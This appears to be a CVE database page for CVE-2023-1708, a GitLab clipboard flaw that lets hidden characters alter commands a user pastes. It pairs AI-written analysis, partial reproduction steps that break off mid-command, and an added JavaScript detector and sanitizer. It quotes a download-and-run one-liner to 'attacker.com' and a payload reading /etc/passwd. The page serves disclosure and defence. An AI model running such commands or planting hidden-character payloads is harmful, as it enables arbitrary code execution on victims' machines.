CVE-2023-1708
Description
An issue was identified in GitLab CE/EE affecting all versions from 1.0 prior to 15.8.5, 15.9 prior to 15.9.4, and 15.10 prior to 15.10.1 where non-printable characters get copied from the clipboard, allowing unexpected commands to be executed on the victim's machine.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
GitLab CE/EE copies non-printable characters to clipboard, allowing attackers to inject arbitrary commands when victims paste into terminals.
Vulnerability
GitLab CE/EE versions from 1.0 up to 15.8.4, 15.9.0 to 15.9.3, and 15.10.0 (i.e., before 15.8.5, 15.9.4, and 15.10.1) have a vulnerability where non-printable or invisible characters (for example the no-break space U+00A0, which renders like an ordinary space) are not visibly distinguishable in the web interface but are copied verbatim to the clipboard when a user clicks a copy button [1]. This affects the "copy to clipboard" functionality for file contents and other text.
Exploitation
An attacker can craft a file, snippet, or markdown block that contains hidden non-printable characters, so the visible text appears benign while the clipboard content differs from what the victim read. When the victim copies the text via the GitLab web interface and pastes it into a terminal, the shell tokenizes the pasted text including the hidden characters and runs something other than the displayed command. For example, an attacker could place a hidden character inside a URL or file name in a one-liner such as wget -O - http://attacker.com/payload.sh | bash, so that the shell requests a different file than the one shown [1].
Impact
Successful exploitation leads to arbitrary command execution on the victim's machine with the user's privileges. This can result in full compromise of the victim's system, data exfiltration, or further lateral movement. The vulnerability is in the clipboard handling, impacting confidentiality, integrity, and availability.
Mitigation
Fixed versions: GitLab 15.8.5, 15.9.4, and 15.10.1. Users should upgrade to one of these or a later release. No workaround is available for affected versions. The issue is not listed on CISA's KEV as of the publication date.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: <15.8.5, 15.9.0-15.9.3, 15.10.0
- Range: >=1.0, <15.8.5
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing sanitization of non-printable characters in the clipboard copy functionality allows hidden characters to be transferred to the user's clipboard."
Attack vector
An attacker embeds non-printable characters (e.g., the UTF-8 sequence `\xc2\xa0`, a no-break space U+00A0) into a command displayed in a GitLab markdown field, such as a README or comment. The victim sees a benign command (e.g., `wget -O - https://server/hello.sh | bash`) because the hidden character renders like an ordinary space. When the victim uses GitLab's "copy to clipboard" button and pastes the text into a terminal, the hidden character is included; the shell does not treat it as a word separator, so it stays attached to the URL token and wget requests a different file name than the one displayed, leading to arbitrary command execution [ref_id=1].
Affected code
The vulnerability exists in GitLab's web interface "copy to clipboard" functionality, which is present across the application wherever text can be copied via a button or link. The issue is that non-printable or invisible characters (e.g., the UTF-8 sequence `\xc2\xa0`, which is the no-break space U+00A0 rather than an ASCII control character) are copied verbatim without being sanitized or visually represented to the user [ref_id=1].
What the fix does
The advisory does not include a patch diff, but the expected remediation is that non-printable characters are either visually represented to the user in the web interface before copying or sanitized out of the clipboard content [ref_id=1]. Either way, the "copy to clipboard" button must not silently transfer characters the user cannot see: they are stripped, or replaced by a visible escape that breaks the command rather than quietly changing it.
Preconditions
- Input: Victim must use GitLab's "copy to clipboard" button (not manual text selection) to copy the displayed command.
- Auth: Attacker must be able to create or edit markdown content (e.g., README, comments, issues) containing non-printable characters.
- Input: Victim must paste the copied text into a shell or terminal that interprets the hidden characters.
Reproduction
1. As attacker, create a file on your server named `hello.sh` with content `echo "hello world"`.
2. Create a file named `hello.sh\xc2\xa0` (containing the non-printable character) with a malicious payload, e.g., `echo 'cat /etc/passwd' > $'hello.sh\xc2\xa0'`.
3. Create a public GitLab repository with a `README.md`.
4. Clone the repo and edit `README.md` to contain: `echo -e $'```bash\nwget -O - https://
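The following is an added example, not GitLab's code and not part of the advisory. It shows two things from the sections above: why the copied one-liner in the reproduction makes the shell fetch `hello.sh` followed by the hidden byte rather than `hello.sh` (the no-break space is not an IFS separator, so it stays glued to the URL token), and the kind of check the "What the fix does" section describes, applied on the clipboard side before text is handed to the user. The sample snippet, the host name `server`, and the helper names are constructed for illustration; the set of flagged code points is wider than the single U+00A0 in the advisory, covering the usual invisible whitespace, format, and control characters.

```javascript
// Added example (not GitLab's code). Demonstrates the hidden-character
// clipboard problem from CVE-2023-1708 and a clipboard-side countermeasure.

// Constructed sample of what the attacker puts in the README. Rendered in a
// browser it looks like "wget -O - https://server/hello.sh | bash"; the
// U+00A0 NO-BREAK SPACE after "hello.sh" (UTF-8 c2 a0) renders like a space.
// A real space follows it so "|" is still a separate token for the shell.
const ATTACKER_SNIPPET = 'wget -O - https://server/hello.sh\u00a0 | bash';

// Split the way a POSIX shell splits an unquoted command line with the
// default IFS (space, tab, newline). U+00A0 is not in IFS, so it is kept
// as part of the preceding word.
function shellWords(cmd) {
  return cmd.split(/[ \t\n]+/).filter((w) => w.length > 0);
}

// Code points that must not travel silently to the clipboard: ASCII and C1
// control characters (tab, LF and CR are legitimate in copied code and are
// excluded), soft hyphen, no-break space, the U+2000 block of spaces and
// zero-width/bidi marks, line/paragraph separators and bidi embeddings,
// word joiner and bidi isolates, ideographic space, and the BOM/ZWNBSP.
const HIDDEN_CHAR =
  /[\u0000-\u0008\u000B\u000C\u000E-\u001F\u007F-\u009F\u00A0\u00AD\u2000-\u200F\u2028-\u202F\u205F-\u206F\u3000\uFEFF]/g;

function codePointLabel(ch) {
  return 'U+' + ch.codePointAt(0).toString(16).toUpperCase().padStart(4, '0');
}

// Report every hidden character with its offset so a UI can flag the
// snippet before (or instead of) copying it.
function findHiddenChars(text) {
  const hits = [];
  for (const m of text.matchAll(HIDDEN_CHAR)) {
    hits.push({ index: m.index, codePoint: codePointLabel(m[0]) });
  }
  return hits;
}

// Remediation option 1: replace each hidden character with a visible escape.
// The pasted command then fails loudly (the URL is visibly mangled) instead
// of silently fetching a different file.
function escapeHiddenChars(text) {
  return text.replace(HIDDEN_CHAR, (ch) => '\\u{' + codePointLabel(ch).slice(2) + '}');
}

// Remediation option 2: strip hidden characters entirely. For this sample the
// result is exactly the command the victim believed they were copying.
function stripHiddenChars(text) {
  return text.replace(HIDDEN_CHAR, '');
}

// Stand-alone demonstration.
console.log('tokens as pasted :', shellWords(ATTACKER_SNIPPET));
console.log('hidden chars     :', findHiddenChars(ATTACKER_SNIPPET));
console.log('escaped for copy :', escapeHiddenChars(ATTACKER_SNIPPET));
console.log('stripped for copy:', stripHiddenChars(ATTACKER_SNIPPET));
```

The escaped form is the safer default for a copy button: stripping makes the command run as displayed, but only because this particular payload relies on an extra character; a payload that relies on the absence of a visible separator would not be neutralized by stripping, whereas an escape always changes what the user sees and can be reviewed before pasting.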
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
News mentions
No linked articles in our index yet.